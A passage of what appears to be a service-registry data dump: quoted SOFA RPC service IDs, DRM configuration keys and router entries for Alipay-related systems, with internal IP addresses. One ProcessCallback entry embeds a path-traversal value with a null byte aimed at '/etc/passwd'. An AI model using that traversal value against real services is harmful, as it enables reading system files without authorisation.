kpayplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WSOrderRecoveryDRMResource.splitorNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-finpromobus-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finsupport:name=com.alipay.finnet.service.drm.ChannelFilterDRM.exchangeCodePriorityList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.126.54#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_OPENSUPPORT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_benefitDefinitionPreSuccessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererWhiteUrls,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.api.AdvancePayAckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zpaas.zappinfo.facade.query.ServerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.45.64.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:publichome@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.certifymngTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.chair-script:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.chargefront:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finannafccore.facade.api.AnnaDSTFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.serializeBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:kbbp_apply_activity_bPProcessCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.rulecenter:name=com.alipay.rulecenter.core.engine.drm.impl.RuleAnalyzeDRMStrategy.needIgnoreDShortCircuit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.service.facade.service.EcoActivityServiceDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antforest.common.service.facade.ForestUserInfoNewService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmng.service.facade.ctrl.assets.AssetService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:publicDomain_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.10.170#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:memberprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gauss.dmp.common.service.facade.api.LabelServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.metadata.ModelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandConditionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbtestcenter.service.facade.demo.DemoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoguard.common.service.facade.metadata.api.BizInspectionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.tag.TagWorkFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.member.facade.MemberBenefitOpGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.investtrade.facade.api.option.SecurityOptionBaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finlsmicrogw.common.service.facade.gateway.api.ServiceDomainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.dataflow.DataFlowBuildService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.membercenterTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clearingcenter.facade.api.ClearingFileManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:imasp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.common.drm.FinacDrmData.dcTimeOutMinutes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitycore.common.service.facade.risk.api.RiskAnalyzeService:1.0:cnctu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.baymax.maintainess.drm.scheduleParameter.app_finfocore.taskRetryDays,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_HDWONS_NOTIFYTEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.trafficlimitcenter.service.facade.VolumeChangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.query.api.ErcAccountFinishQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csportal.service.facade.api.MessageNoticeService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.ModelConfigService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_OPERATOR#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.tradequery.common.service.facade.TradeBaseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rdf.gray.config.facade.service.RdfGrayConfigOptService:1.0:finbaservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:openauth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recneptune.common.service.facade.RecommendHistoryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.common.service.facade.PaycheckerDynamicRuleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundbudget.facade.api.FdbudgetBackendViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudlego.common.service.facade.CloudlegoServiceOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencommon.rcache.facade.RCacheClearQueueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.ReceiveIvrReceiptService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.holoxmng.content.service.facade.HoloxSampleItemService:1.0:holoxSamplePictureLinkService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:globalprod_kyb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:userIndexCleanExecuter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datacontextlib.service.facade.limitcum.CumulateQueryFacade:1.0:zdataquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finsupport.component.cache.masterdata.drm.ResultStatusSwitchDRM.queryByBizResultStatusSwitchOn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ifxbase.common.scheduler.SchedulerHandler:1.0:genTransactionCostQuoteHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iaassettrans.facade.fabs.api.manage.FinanceAssetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.176.66#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_PAYCOREPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cloudnet.facade.callback.UniformCallbackFacade:1.0:zpaascoreng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.PointPrizeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.service.integration.drm.SysParamService.commonConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finrtcenter.common.service.facade.evaluation.EvaluationAuthorizationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.InstitutionDrmResource.selfWithholdSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:stockassetcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.242.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pointcore.common.service.facade.query.GenericPointQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.module.merchant.facade.api.MerchantStandardOnboardService:1.0:globalsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.specialbusiness.api.query.AcctransManulFreezeLogQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:csplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudbox.facade.api.InconsistentFixFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_BBCMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.riskservice.spi.OpsChngAsyncRiskService:1.0:dbchangeautopilot@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.antha.activity.ActivityBroadcastFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.MessageSpi:1.0:alideviceinfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstrategy.common.service.facade.fixedinvestment.FixedProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.anteduprod.common.service.facade.api.SceneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finloancenter.common.service.facade.FinancingDisclosureTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.mng.SelfCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_IMOBILEMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemrp.common.service.facade.TemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:arater@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.NettingClearingRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.order.PaymentNoticeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.resultwrap:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccountRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.split.Splitor:1.0:apprOrderRecoverySplitor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseamng.investor.CampInvestorRelationServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksettlemng_unifiedExchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdecision.common.service.facade.api.FundReserveCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.service.integration.drm.loadtest.LoadTestConfigDrm.fundQueryJBContractConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finbatch.comm.service.facade.callback.SchedulerNotifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.facade.flux.spi.FinnetReceiveService:1.0:instdispute@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.InvestOpinionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bktoc.common.service.facade.api.MyTabRecommendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.payacceptance.AgrtProdConfirmManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.material.DynamicTemplateQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.159.135#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ccdc.common.service.facade.CardInfoService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.goldetfprod.common.service.facade.gold.AssetProfitInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaserver.facade.PvSofaService:1.0:base@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.drm.ServiceRouteSwitchDrmResoureInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditprod.service.PcreditAuthUserAccumulationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_ORDER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.minitrans.service.facade.musedcredit.api.MuctransManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.129.170#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.zpaas.zappinfo.facade.query.ServerLabelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.overseaexprod.comon.service.facade.rate.RatePromotionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.MiniCacheService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unirelease.common.service.facade.UniReleaseAppApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.ryb.RYBBalancePurchaseLimitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mindv.okcourse.service.OkCourseCompleteTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PAYFLUX#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.search.api.SearchProductStatisticFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.cdp.SpaceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.admin.AdminCPFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_BANK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.reservemng.service.facade.query.TreasuryAccountBalanceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.MetaQueryFacade:1.0:bxopssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.service.facade.AccountListenFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.biz.policy.proxy.securitycore.HaProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.BatchDeductCmd.corePoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.19.28.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mdeduct.service.ldc.UserProtocolGZService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloancollection.common.service.facade.collcase.CollCaseDeductOperatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.CommonTriggerDrm.wishFixedTransRecord,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.common.service.integration.chngservice.proto.OpsChangeService:1.0:lifecycle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcactivitycore.facade.template.PcacoreActivityTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshynotify.common.service.integration.client.cryptlib.NotifyEncryptService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthserviceprod.common.service.facade.api.HealthServiceNoticeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.partner.PartnerSecurityManageFacade:1.0:mapitool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.iotcore.api.RpcConfigApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.83.4.198#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.oceanbase.obforumcore.service.activity.ActivityForumAndAgendaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscvprod.common.service.facade.InsClaimTraceMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.EinvFileFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_PAYLINK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.mockapp:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finslip:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileorderprod.service.facade.tenantdispatch.TenantDisplayOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icompliance.facade.api.AutoTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.algoevaluator.common.service.IndicatorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:finormweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mrchmembercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","pcreditbenefit@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.riskservice.spi.OpsChngSyncRiskService:1.0:inspect_sync@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bioperation.service.facade.api.TowerFunctionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.habaseline.common.facade.service.metadata.MetaDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmonitor.common.service.facade.IMonitorCenterMenuService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.revcore.common.service.finaccenter.facade.api.SimulationGlVchrFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/../../../../../../../etc/passwd\u0000.jpg@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.TR_UI_v2.3.061200:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataCollectWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paychecker.common.service.paycheckersdk.service.ReversePayCheckerService:1.0:pcreditcheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.rpc.CommonCountRpc:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecore.common.service.facade.view.ComponentAuthQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.common.service.facade.api.risk.RiskEvaluateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.poscore.common.service.facade.express.bankchlerrorcode.BankChannelErrorCodeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imtmsvcprod.common.service.facade.edu.SchoolBackyardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","id.dana.bizcenter.common.service.facade.api.BizDestinationInquiryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_Y_ZERO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ecoqltprod.core.service.crawlingant.CrawlingantEquityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.CustomerDataFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bkmerchantprod.common.service.facade.trade.TradeMerchantCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecashier.service.facade.spi.CashierActivityCallbackFacade:1.0:peerpay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.video.VideoContentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bumng.common.service.facade.NameSearchService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bketensip_eten_process@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mfinquotationprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.serverlesscore.YamlTestApi20Service:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloantrade.common.service.facade.loan.api.AntTokenQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.stdtrustee.StdTrusteeCheckerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lyncas.kvresource.facade.KeyValueResourceFacade:1.0:unimetasvccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundprod.common.service.facade.product.query.FundPoolQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.common.service.facade.topic.LifeServiceTopicFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@kbasecore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.superapires.facade.admin.PackageMountManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.OutCardBizDRM.sameNameVLDWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finbaservice.common.service.facade.config.WithdrawConfigManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.rate.triple.RatePortalEntryTriple:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.product.VerifyProductMenuFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.DrmForCommonManageResource.skipAboss,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.component.service.zone.ProcessDispatcherClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbconfigcenter.common.service.facade.api.meta.MetaInstanceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdatafront.common.service.facade.BatchQueryTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:alipay-demo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pfunddts.common.facade.spi.RobotCallBackSPI:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zmyschecker.common.service.facade.collie.CollieApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_DTBANK#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.33.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.137.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.scardcenter.common.service.facade.OfflinepayAntForestEnergyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-tiyubiz-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pucprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfbrmp.facade.GfbrmpOperateFacade:1.0@DE